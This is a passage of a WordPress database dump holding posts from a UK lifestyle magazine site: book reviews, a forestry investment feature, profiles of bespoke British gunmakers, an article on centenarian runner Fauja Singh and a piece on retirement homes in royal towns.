class=\"st_facebook_hcount\" st_title=\"Bibliophile’s Corner. Trade Winds to Meluhha by Vasant Davé\" st_url=\"http://westonspirit.org.uk/2012/06/bibliophiles-corner-trade-winds-to-meluhha-by-vasant-dave/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Bibliophile’s Corner. Trade Winds to Meluhha by Vasant Davé\" st_url=\"http://westonspirit.org.uk/2012/06/bibliophiles-corner-trade-winds-to-meluhha-by-vasant-dave/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<p><img class=\"alignright  wp-image-2416\" title=\"Trade-Winds-To-Meluhha\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/06/Trade-Winds-To-Meluhha.jpg\" alt=\"\" width=\"180\" height=\"270\" />In ancient Mesopotamia Samasin the stable boy is falsely convicted of murder. When a double eclipse saves his life he flees his homeland in search of a man whose name the dying victim whispered to him. With murderers eager to protect their crime network on his heels Samasin faces an adventure of his life.</p>&#13;\n<p>I grew up on adventure stories that spanned continents, with Jules Vernes’ In Search of the Castaways and the Mysterious Island being my favourite, and Trade Winds to Meluhha certainly reminded me of the hours I spent imagining distant lands with danger at every step. Mr Davé did a great job crafting an elaborate story that was not at all straight-forward and although towards the middle all the culprits were perfectly clear the many obstacles in the way of bringing them to justice kept things interesting. There were several sub-plots and adventurous asides that in the end played a role in the main story and I commend Mr Davé for crafting a novel with this many levels and still managing to keep the pace up without a sluggish moment to create a satisfying resolution that felt natural and logical.</p>&#13;\n<p>With this many plot lines to keep track of the abundance of characters was taxing at times. Two I had trouble distinguishing altogether, some I wasn’t sure were all that necessary, but the main characters were interesting and developed nicely, so I mostly paid attention to them. I liked how they often had secrets that kept me guessing for a while and I enjoyed seeing their transformations as the novel progressed. I think Velli was probably the most changed character by the end of the book and it was fun to see her gradual evolution from a naughty daughter of a wealthy man to a kind and caring lady.</p>&#13;\n<p>My main issue with this book was the language. It wasn’t awkward or inappropriate at any time, but it felt foreign, like a translation that is done without allowing for stylistic differences between two languages. It wasn’t a deal-breaker by any means but it did affect my perception. Another factor was that the novel is set in ancient time, two thousand years BC, but a lot of the speech patterns, terminology and idioms used in the book are modern. Combine that with a drug trade and human trafficking and often the novel felt like present day crime drama somehow transported into the time of camels and reed ships. Also, I felt that the whole human trafficking situation was a bit contrived. Had the author stuck with slavery the key developments could have been easily preserved without compromising anything but the story would have felt more time-appropriate and natural.</p>&#13;\n<p>In the end this is a solid adventure novel with great characters and it made me want to read more in the genre.</p>&#13;\n<p>My rating: 3+ </p><div class=\"woo-sc-hr\"></div>&#13;\n									</div>','Bibliophile’s Corner. Trade Winds to Meluhha by Vasant Davé','In ancient Mesopotamia Samasin the stable boy is falsely convicted of murder. When a double eclipse saves his life he flees his homeland in search of a man whose name the dying victim whispered to him. With murderers eager to protect their crime network on his heels Samasin faces an adventure of his life.','publish','open','open','','bibliophiles-corner-trade-winds-to-meluhha-by-vasant-dave','','','2018-04-02 20:05:58','2018-04-02 20:05:58','',0,'http://westonspirit.org.uk/bibliophiles-corner-trade-winds-to-meluhha-by-vasant-dave.asp',0,'post','',0),(186,1,'2016-02-03 03:12:27','2016-02-03 03:12:27','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">3 June 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Create a legacy that grows\" st_url=\"http://westonspirit.org.uk/2012/06/create-a-legacy-that-grows/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Create a legacy that grows\" st_url=\"http://westonspirit.org.uk/2012/06/create-a-legacy-that-grows/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Create a legacy that grows\" st_url=\"http://westonspirit.org.uk/2012/06/create-a-legacy-that-grows/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Create a legacy that grows\" st_url=\"http://westonspirit.org.uk/2012/06/create-a-legacy-that-grows/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Create a legacy that grows\" st_url=\"http://westonspirit.org.uk/2012/06/create-a-legacy-that-grows/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>Investing in forestry is becoming increasingly popular, providing a regular income for your family and environmental benefits for now and for future generations</h4>&#13;\n<p></p><div id=\"attachment_2311\" class=\"wp-caption alignright\" style=\"width: 310px\"><img class=\"size-full wp-image-2311\" title=\"Ethical Forestry1\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/06/Ethical-Forestry1.jpg\" alt=\"\" width=\"300\" height=\"453\" /><p class=\"wp-caption-text\">A sustainable investment</p></div>&#13;\n<p>Investing for your children and grandchildren is often regarded as one of the most important decisions you can make in life.</p>&#13;\n<p>As the cost of living continues to spiral out of control, it no doubt leaves most parents and grandparents wondering how their family will be able to cope with the seemingly relentless financial pressure.</p>&#13;\n<p>If you consider the life path of a child from birth to a middle aged, financially secure person, there are considerable and inevitable financial hurdles to be overcome.</p>&#13;\n<p>School fees, family holidays, driving lessons, first car purchases, university fees, house deposits and starting a family all represent significant landmarks, all of which can be costly. There is no doubt that a regular and reliable income can ease this pressure and help create a more secure and better quality of life.</p>&#13;\n<p>If you are considering investing in the future of your loved ones, you may wish to consider a high-return timber investment from Ethical Forestry. Firmly established as one of the UK’s leading forestry investment providers, they have a proven track record for delivering investors their projected returns.</p>&#13;\n<p>Their most popular investment of £18,000 over 12 years projects a total return of £104,189, with payments made to the investor in years 4,8 10 and 12.</p>&#13;\n<p>Mark Finn of Ethical Forestry says: “If you are looking for a longer-term investment, we offer a 24-year investment called the income and wealth generator.</p>&#13;\n<p>“The investment provides regular payments to the beneficiary in years 4, 8, 10, 12, 16, 18, 20, 22 and 24. It was created as a direct result of working with parents and grandparents who required regular income during the school years and regular, larger payments during adulthood.</p>&#13;\n<p>“A typical investment of £36,000 invested over 24 years projects a total return of more than £1m.”</p><div class=\"woo-sc-hr\"></div>&#13;\n<h5>0800 075 30 10</h5>&#13;\n<h5><em><a href=\"http://www.forestleisure.org.uk /\" target=\"_blank\">www.forestleisure.org.uk</a> </em> <div class=\"woo-sc-hr\"></div></h5>&#13;\n									</div>','Create a legacy that grows','Investing in forestry is becoming increasingly popular, providing a regular income for your family and environmental benefits for now and for future generations','publish','open','open','','create-a-legacy-that-grows','','','2018-04-02 20:05:57','2018-04-02 20:05:57','',0,'http://westonspirit.org.uk/create-a-legacy-that-grows.asp',0,'post','',0),(188,1,'2014-06-11 19:40:38','2014-06-11 19:40:38','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">3 June 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\"></span>&#13;\n        </span></p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Gunning for greatness\" st_url=\"http://westonspirit.org.uk/2012/06/gunning-for-greatness/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Gunning for greatness\" st_url=\"http://westonspirit.org.uk/2012/06/gunning-for-greatness/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Gunning for greatness\" st_url=\"http://westonspirit.org.uk/2012/06/gunning-for-greatness/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Gunning for greatness\" st_url=\"http://westonspirit.org.uk/2012/06/gunning-for-greatness/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Gunning for greatness\" st_url=\"http://westonspirit.org.uk/2012/06/gunning-for-greatness/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Bespoke gunmaking is a craft appreciated by royals and the rest for centuries. We look at what the very best British gunsmiths have to offer</h4>&#13;\n<p></p><div id=\"attachment_2348\" class=\"wp-caption alignright\" style=\"width: 606px\"><img class=\"size-full wp-image-2348\" title=\"gunning\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/06/gunning.jpg\" alt=\"\" width=\"596\" height=\"398\" /><p class=\"wp-caption-text\">Right on target</p></div>&#13;\n<p>Royal warrants recognise British tradition and craftsmanship – and nowhere is this more evident than in the production of fine sporting shotguns and rifles.</p>&#13;\n<p>The main centre of the trade is London, where one of the leading names in the world, royal warrant holders James Purdey &amp; Sons, is based.</p>&#13;\n<p>“London has been a centre of excellence for the craft of gunmaking for well over 200 years,” says Richard Purdey, director and former chairman of the firm founded by his forebears in 1814. It has held a royal warrant since 1868.</p>&#13;\n<p>Guns are built in its Hammersmith factory in west London, using British components such as barrel forgings from Sheffield. The craftsmen are trained in a five-year apprenticeship and specialise in one of the individual skills required such as the making of barrels, actions or furniture (the lock and trigger). After completing their apprenticeship, they earn the right to stamp their initials on the part of the gun they created.</p>&#13;\n<div class=\"woo-sc-quote boxed\"><p>“After completing their apprenticeship, the craftsmen earn the right to stamp their initials on the part of the gun they created”</p></div>&#13;\n<p>Technology supplements these skills. Computer-aided design and manufacture allow component parts, machined to tolerances of less than one thousandth of an inch.</p>&#13;\n<p>A bespoke gun such as a classic Purdey game gun will take 18 months to build and could cost in the region of £75,000. “A Purdey is an investment to be handed down through the generations,” says Richard Purdey.</p>&#13;\n<p>Hundreds of miles away in eastern Scotland, Michael Lingard lives and works in the small village of Friockheim in Angus, supplying guns to the Prince of Wales.</p>&#13;\n<p>“Thanks to the high level of craftsmanship, there is a very strong interest in British-built guns both in this country and worldwide, particularly from America,” he says.</p>&#13;\n<p>Lingard, who began as an apprentice in 1973 before setting up his own business in 1980, builds guns to a customer’s specification. British customers are likely to place an order for 12-, 16- and 20-gauge guns with a view to shooting grouse, pheasant and partridge. The American market favours quail shooting and opts for smaller 20- and 28-gauge guns.</p>&#13;\n<p>“Building a gun is not a one-man job,” he says, explaining that he draws on other specialists, from precision engineers to engravers.</p>&#13;\n<p>Lingard is well known for the exceptional quality of his walnut stock blanks, all of which he sources personally in Turkey. Back at his Friockheim workshops, he takes the air-dried stocks and further reduces their moisture content to 8-10 per cent.</p>&#13;\n<p>“It’s extremely satisfying to take a blank of the finest walnut and turn it into a magnificent stock,” he says.</p>&#13;\n<p>Clients bring in their existing guns or measurements from a shooting school to establish the length, bend and cast-on or cast-off (the specialist term for how the stock is shaped and carved), depending on whether they shoot from the left or right shoulder respectively.</p>&#13;\n<p>For Lingard this craft, which includes repair and maintenance as well as manufacture, is almost a vocation. “It is not only an occupation but a way of life,” he says. “And it is a real pleasure to work with discerning clients who appreciate the workmanship whether it be on a new gun or a replacement stock.”</p>&#13;\n<p>Prices for a single shotgun would start at around £38,000, with a delivery time of 18-30 months. Engraving, another specialist art, and design skills are at extra cost, as are fully fitted gun cases for these masterpieces.</p><div class=\"woo-sc-hr\"></div>&#13;\n									</div>','Gunning for greatness','Bespoke gunmaking is a craft appreciated by royals and the rest for centuries. We look at what the very best British gunsmiths have to offer','publish','open','open','','gunning-for-greatness','','','2018-04-02 20:05:55','2018-04-02 20:05:55','',0,'http://westonspirit.org.uk/gunning-for-greatness.asp',0,'post','',0),(189,1,'2016-06-07 12:31:31','2016-06-07 12:31:31','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">3 June 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Hunt with highest calibre\" st_url=\"http://westonspirit.org.uk/2012/06/hunt-with-highest-calibre/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Hunt with highest calibre\" st_url=\"http://westonspirit.org.uk/2012/06/hunt-with-highest-calibre/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Hunt with highest calibre\" st_url=\"http://westonspirit.org.uk/2012/06/hunt-with-highest-calibre/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Hunt with highest calibre\" st_url=\"http://westonspirit.org.uk/2012/06/hunt-with-highest-calibre/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Hunt with highest calibre\" st_url=\"http://westonspirit.org.uk/2012/06/hunt-with-highest-calibre/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>For over 30 years, top-quality bespoke guns have been crafted for customers, from keen shots to Prince William</h4>&#13;\n<p><img class=\" wp-image-2339 alignright\" title=\"Lingard\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/06/Lingard.jpg\" alt=\"\" width=\"596\" height=\"397\" />When an accomplished shot wishes to buy a gun, they naturally look for the highest level of craftsmanship. That often means the name of Michael Lingard comes into the frame.</p>&#13;\n<p>Michael Lingard holds the royal warrant as gunmaker to the Prince of Wales. He was commissioned by the prince to make a .234 rifle as a gift for his son, Prince William, for his 18th birthday.</p>&#13;\n<p>Lingard has been making bespoke guns in Friockheim, near Brechin in Angus, for 32 years. His workshop is based in an elegant former bank building, which bears the royal warrant.</p>&#13;\n<p>“Each gun is made to the individual customer’s specifications,” says Lingard. “They usually want a beautifully figured piece of walnut for the stock, so I travel throughout Europe looking for the highest quality walnut stock blanks available.”</p>&#13;\n<p>Lingard is particularly renowned for his stockmaking, having learnt the skills during a five year apprenticeship to Ted Slater, a stocker and actioner at London gunmakers Stephen Grant &amp; Joseph Lang.</p>&#13;\n<p>Each stock is individually crafted to the customer’s measurements. “Usually there is a gold oval or shield mounted on the underside of the stock, that bears the client’s initials or coat of arms,” says Lingard.</p>&#13;\n<p>The action body may be engraved or carved in a pattern selected by the client.</p>&#13;\n<div class=\"woo-sc-quote boxed\"><p>Lingard says: “I usually produce about six guns a year. An individual gun may take two years to make.”</p></div>&#13;\n<p>Personal recommendations often bring customers from all over the world to Lingard’s workshop.</p>&#13;\n<p>Once purchased (and a shotgun, excluding engraving, starts at around £38,000), customers can return the gun for servicing, knowing they will be in the hands of a gunmaker whose craftsmanship is recognised by the royal warrant.</p><div class=\"woo-sc-hr\"></div>&#13;\n<h5><a href=\"mailto:office@michael-lingard.com\" target=\"_blank\"><em>office@michael-lingard.com</em></a></h5>&#13;\n<h5>01241 828649<div class=\"woo-sc-hr\"></div></h5>&#13;\n<p> </p>&#13;\n									</div>','Hunt with highest calibre','For over 30 years, top-quality bespoke guns have been crafted for customers, from keen shots to Prince William','publish','open','open','','hunt-with-highest-calibre','','','2018-04-02 20:05:53','2018-04-02 20:05:53','',0,'http://westonspirit.org.uk/hunt-with-highest-calibre.asp',0,'post','',0),(190,1,'2016-04-14 22:02:14','2016-04-14 22:02:14','<div class=\"entry\">&#13;\n                    <p>I have no memory of the king having a stutter. He was just an old posh English bloke speaking very slowly We go back a long way, me and the royal family. Can you believe I have lived through four reigns? I tell my grandchildren this and they think it’s a fib, for of course [...]</p>&#13;\n                </div>','2012  June - Part 2','','publish','open','open','','2012-june-part-2','','','2018-04-02 20:05:52','2018-04-02 20:05:52','',0,'http://westonspirit.org.uk/2012-june-part-2.asp',0,'post','',0),(192,1,'2015-01-20 13:36:45','2015-01-20 13:36:45','<div class=\"entry\">&#13;\n                    <p>Personal service has tailored to the individual needs of many, including King George VI, making it an enduring choice through the decades When you are looking for a suit fit for a king, visit a king’s tailor. Benson &amp; Clegg, in Piccadilly Arcade on London’s Jermyn Street was granted the royal warrant as official tailor [...]</p>&#13;\n                </div>','2012  June - Part 3','','publish','open','open','','2012-june-part-3','','','2018-04-02 20:05:49','2018-04-02 20:05:49','',0,'http://westonspirit.org.uk/2012-june-part-3.asp',0,'post','',0),(193,1,'2015-04-22 13:04:43','2015-04-22 13:04:43','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">3 June 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> dwain\" title=\"Posts by Deborah Wain\" rel=\"author\"&gt;Deborah Wain</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_buttons\" st_title=\"Positive steps\" st_url=\"http://westonspirit.org.uk/2012/06/positive-steps/\" displaytext=\"share\"></span><span class=\"st_linkedin_buttons\" st_title=\"Positive steps\" st_url=\"http://westonspirit.org.uk/2012/06/positive-steps/\" displaytext=\"share\"></span><span class=\"st_twitter_buttons\" st_title=\"Positive steps\" st_url=\"http://westonspirit.org.uk/2012/06/positive-steps/\" displaytext=\"share\"></span><span class=\"st_facebook_buttons\" st_title=\"Positive steps\" st_url=\"http://westonspirit.org.uk/2012/06/positive-steps/\" displaytext=\"share\"></span><span class=\"st_plusone_buttons\" st_title=\"Positive steps\" st_url=\"http://westonspirit.org.uk/2012/06/positive-steps/\" displaytext=\"share\"></span>						</div>&#13;\n                	                	                	<h4>101-year-old Fauja Singh, who recently ran his eighth London Marathon, believes longevity is in the genes – but keeping fit helps</h4>&#13;\n<p></p><div id=\"attachment_2269\" class=\"wp-caption alignright\" style=\"width: 253px\"><img class=\" wp-image-2269 \" title=\"Fauja Singh\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/06/Fauja-Singh.jpg\" alt=\"\" width=\"243\" height=\"433\" /><p class=\"wp-caption-text\">Fauja Singh is ending his marathon days, aged 101</p></div>&#13;\n<p>Longevity, says Fauja Singh, runs in his family. His grandfather and other relatives sailed past the 100- year mark and Singh himself is, by his own reckoning, 101 (birth certificates were in short supply in his part of the Punjab in 1911, he points out.)</p>&#13;\n<p>But while genes may play a role, “positivity and staying active” has also helped, he says: the super fit great- Grandfather, who lives in Ilford, recently completed the London Marathon for the eighth time, finishing in seven hours and 49 minutes.</p>&#13;\n<p>He began running after he moved to the UK at age 81 following the death of his wife. Depressed and at a loss for much to do he watched a lot of television and became fascinated by coverage of the London Marathon. Having done some running in his youth he was inspired to start again by what he saw.</p>&#13;\n<p>Besides his tough training regime – he gets up at six every day for an eight-mile walk and run – he is teetotal.</p>&#13;\n<p>“I have never smoked and follow a simple, vegetarian diet. I drink lots of water and take tea with ginger. I also try to avoid negativity and negative people,” he says.</p>&#13;\n<p>His trainer, Harmander Singh, who also trains other runners in their 80s, says that what sets Fauja apart is his enthusiasm and desire to run. “If I suggested he run 10k he would say ‘why not 20?’” says Harmander.</p>&#13;\n<p>Centenarians as fit as Fauja Singh are rare but it’s a fact that more people are living longer. Average life expectancy in the UK now tops 80 – eight years more than during the 1970s – though Monaco has the world’s highest life expectancy at 89.73 years, as measured by the CIA World Factbook.</p>&#13;\n<p>Lifespan increase has been put down to factors such as improved drug treatments and lifestyle changes such as better diet and falling smoking rates.</p>&#13;\n<p>Peter Mace, assistant medical director for Bupa Health and Wellbeing, says keeping your body moving as you get older is important – “I’d say it’s the best single thing you can do for yourself.” But he adds that longevity is thought to be about a third determined by genetic background. “Choose your parents with care,” he says, wryly.</p>&#13;\n<p>Meanwhile, research at Glasgow University has shed more light on life expectancy and whether we might be able to predict how long we will live.</p>&#13;\n<p>A team led by Professor Pat Monaghan examined the link between the length of telomeres – which lie at the end of chromosomes – and lifespan. Tests on zebra finches over nine years showed that the longest lived had longer telomeres and the best predictor of lifespan was the length of the telomeres early in life.</p>&#13;\n<p>Monaghan says: “Difficulties arise in sampling people due to the length of time they live but human studies do suggest a relationship between telomere length and life expectancy.”</p>&#13;\n<p>In Ilford, Fauja Singh has decided this year’s marathon was his last one: he plans to concentrate on what he refers to as shorter runs. Just the “5k and 10k from now on…”</p><div class=\"woo-sc-hr\"></div>&#13;\n									</div>','Positive steps','101-year-old Fauja Singh, who recently ran his eighth London Marathon, believes longevity is in the genes – but keeping fit helps','publish','open','open','','positive-steps','','','2018-04-02 20:05:47','2018-04-02 20:05:47','',0,'http://westonspirit.org.uk/positive-steps.asp',0,'post','',0),(194,1,'2017-11-28 16:17:13','2017-11-28 16:17:13','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">3 June 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> gnorwood\" title=\"Posts by Graham Norwood\" rel=\"author\"&gt;Graham Norwood</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Residence of royalty\" st_url=\"http://westonspirit.org.uk/2012/06/residence-of-royalty/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Residence of royalty\" st_url=\"http://westonspirit.org.uk/2012/06/residence-of-royalty/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Residence of royalty\" st_url=\"http://westonspirit.org.uk/2012/06/residence-of-royalty/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Residence of royalty\" st_url=\"http://westonspirit.org.uk/2012/06/residence-of-royalty/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Residence of royalty\" st_url=\"http://westonspirit.org.uk/2012/06/residence-of-royalty/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>No need to curtsey but towns and counties with royal associations do offer elegant and sophisticated surroundings for older homebuyers</h4>&#13;\n<p><img class=\"alignright size-full wp-image-2263\" title=\"kingston\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/06/kingston.jpg\" alt=\"\" width=\"596\" height=\"335\" />The bunting is up, the tables are out and the celebrations are in full swing – and there’s a way you can enjoy a royal life far beyond this summer’s diamond jubilee street parties.</p>&#13;\n<p>The good news for monarchists is that there are perfect developments for retirees and older residents in Britain’s burgeoning number of towns and boroughs with royal patronage.</p>&#13;\n<p>Royal Leamington Spa was granted the title in 1838 by Queen Victoria, and Royal Tunbridge Wells in 1909 by Edward VII. Last year, Royal Wootton Bassett won its regal epithet in recognition of its efforts to honour Britain’s war dead.</p>&#13;\n<p>Meanwhile, Greenwich has this year joined Windsor and Maidenhead, Kensington and Chelsea and Kingston-upon-Thames in the list of royal boroughs. There’s also the county of Royal Berkshire and in Wales, Caernarfon also includes the word “royal” in its title.</p>&#13;\n<p>Developers love these locations because they are steeped in history with listed properties and conservation areas that provide dignified and gentle locations for older buyers.</p>&#13;\n<p>For example, Banner Homes has new homes for the over-55s in Berkshire at Glebelands, a family estate in Wokingham built in 1897. The new apartments and cottages are designed to complement a neighbouring listed building.</p>&#13;\n<p>“The development will provide the best of both worlds with a communal clubhouse complete with kitchen and large TV where residents can come together, but still have privacy and space within their own apartment or cottage,” says Banner’s Shelley West. Prices range from £250,000 to £600,000.</p>&#13;\n<p>Still in Berkshire, developer Pegasus has a right royal offer at its Calcot Priory scheme in a quiet area close to the bustling town of Reading. There are 64 one- and two-bedroom apartments for sale in seven different designs at prices ranging from £154,950 to £284,950.</p>&#13;\n<p><img class=\"alignright  wp-image-2265\" title=\"windsor\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/06/windsor.jpg\" alt=\"\" width=\"180\" height=\"266\" />As with many retirement schemes this one has an on-site estate manager, a Careline 24-hour emergency call system, lifts to all floors, secure parking with electronic gates, landscaped gardens and a fitness suite. But there is a bonus this summer: every visitor viewing a property before 1 July will take away an official diamond jubilee £5 coin.</p>&#13;\n<p>In Royal Tunbridge Wells, a favourite Kent town for retirees, about 40 per cent of residents are aged 55 or over. Unsurprisingly, the town has many specialist developments for older buyers. For example, there is a one-bedroom apartment available at Chartwell Lodge, a scheme built in an older part of the town: there is a guest suite for visitors to hire and an owners’ lounge plus communal gardens. All this is £185,950 from Wood &amp; Pilcher.</p>&#13;\n<p>There are retirement properties for sale at almost every other town and borough with royal patronage. Websites such as Retirement Homesearch and the Accessible Property Register are good starting points. There are plenty of homes perfect for over-55s in Windsor, Wootton Bassett and Kingston-upon- Thames especially.</p>&#13;\n<p>So enjoy the street party tea and cake, then crown your celebrations. Buy a new home in a royal hotspot.</p><div class=\"woo-sc-hr\"></div> &#13;\n									</div>','Residence of royalty','No need to curtsey but towns and counties with royal associations do offer elegant and sophisticated surroundings for older homebuyers','publish','open','open','','residence-of-royalty','','','2018-04-02 20:05:45','2018-04-02 20:05:45','',0,'http://westonspirit.org.uk/residence-of-royalty.asp',0,'post','',0),(195,1,'2018-03-18 16:56:59','2018-03-18 16:56:59','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">8 June 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> ojones\" title=\"Posts by Olga B. Jones\" rel=\"author\"&gt;Olga B. Jones</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Bibliophile’s Corner. The Artist of Disappearance by Anita Desai\" st_url=\"http://westonspirit.org.uk/2012/06/review-the-artist-of-disappearance-by-anita-desai/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Bibliophile’s Corner. The Artist of Disappearance by Anita Desai\" st_url=\"http://westonspirit.org.uk/2012/06/review-the-artist-of-disappearance-by-anita-desai/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Bibliophile’s Corner. The Artist of Disappearance by Anita Desai\" st_url=\"http://westonspirit.org.uk/2012/06/review-the-artist-of-disappearance-by-anita-desai/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Bibliophile’s Corner. The Artist of Disappearance by Anita Desai\" st_url=\"http://westonspirit.org.uk/2012/06/review-the-artist-of-disappearance-by-anita-desai/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Bibliophile’s Corner. The Artist of Disappearance by Anita Desai\" st_url=\"http://westonspirit.org.uk/2012/06/review-the-artist-of-disappearance-by-anita-desai/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<p>Award-winning, internationally acclaimed author Anita Desai ruminates on art and memory, illusion and disillusion, and the sharp divide between life’s expectations and its realities in three perfectly etched novellas. Set in India in the not-too-distant past, the stories’ dramas illuminate the ways in which Indian culture can nourish or suffocate. All are served up with Desai’s characteristic perspicuity, subtle humor, and sensitive writing.<a href=\"http://bibliophilescorner.blogspot.co.uk/2011/12/review-artist-of-disappearance-by-anita.html\"><img class=\"alignright  wp-image-2370\" title=\"artist-of-disappearance\" src=\"/wp-content/uploads/2012/06/artist-of-disappearance-300x452.jpg\" alt=\"\" width=\"180\" height=\"271\" /></a></p>&#13;\n<p>In just a few days this book will hit the stores and I hope that many of you will go out and buy it because it is, in a word, wonderful. The rich and elegant writing transports you into the characters’ worlds and makes you feel like you’re right there with them, living their lives, feeling their pain, their joy, their turmoil and their bliss. It did that for me anyway.</p>&#13;\n<p>The relatively short novellas surprised me by how much substance there was in their pages, how I had to take a break between each one to reflect upon the characters, the time and place, the circumstances. This reflection wasn’t a matter of choice, I really had to do it, let everything sink in, work its way through me, and that made the experience all the more fulfilling because it’s not often that I find books that pack that kind of punch. All three novellas are powerful in their own way but the third one, the one that lends its title to the collection, is my favorite because it is the most multi-faceted and most positive of the three.</p>&#13;\n<p>While Ravi is a textbook recluse his joy from creating and his lack of desire to have anyone else’s approval were in such refreshing contrast to the mode of thinking which almost dictates that if one spends their time doing something the activity must be financially gainful or at least bring some sort of renown. My favorite thing about Ravi though wasn’t that he was a person who created simply to create, but that he was a person who didn’t become discouraged by setbacks, he just changed direction and proceeded on a different path. I think that’s an excellent message since we all can become discouraged if things don’t go exactly the way we plan.</p>&#13;\n<p>There really wasn’t anything that I didn’t like about this book, it was deeply satisfying and made me curious to read Anita Desai’s other works. I highly recommend it to anyone. <br />My rating: 5</p>&#13;\n									</div>','Bibliophile’s Corner. The Artist of Disappearance by Anita Desai','Award-winning, internationally acclaimed author Anita Desai ruminates on art and memory, illusion and disillusion, and the sharp divide between life’s','publish','open','open','','bibliophiles-corner-the-artist-of-disappearance-by-anita-desai','','','2018-04-02 20:05:43','2018-04-02 20:05:43','',0,'http://westonspirit.org.uk/bibliophiles-corner-the-artist-of-disappearance-by-anita-desai.asp',0,'post','',0),(196,1,'2016-06-15 15:28:34','2016-06-15 15:28:34','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">3 June 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Get Up &amp; Go – Royal Warrants\" st_url=\"http://westonspirit.org.uk/2012/06/royal-warrants-2/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Get Up &amp; Go – Royal Warrants\" st_url=\"http://westonspirit.org.uk/2012/06/royal-warrants-2/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Get Up &amp; Go – Royal Warrants\" st_url=\"http://westonspirit.org.uk/2012/06/royal-warrants-2/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Get Up &amp; Go – Royal Warrants\" st_url=\"http://westonspirit.org.uk/2012/06/royal-warrants-2/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Get Up &amp; Go – Royal Warrants\" st_url=\"http://westonspirit.org.uk/2012/06/royal-warrants-2/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<p>Diamond Jubilee, Elizabeth 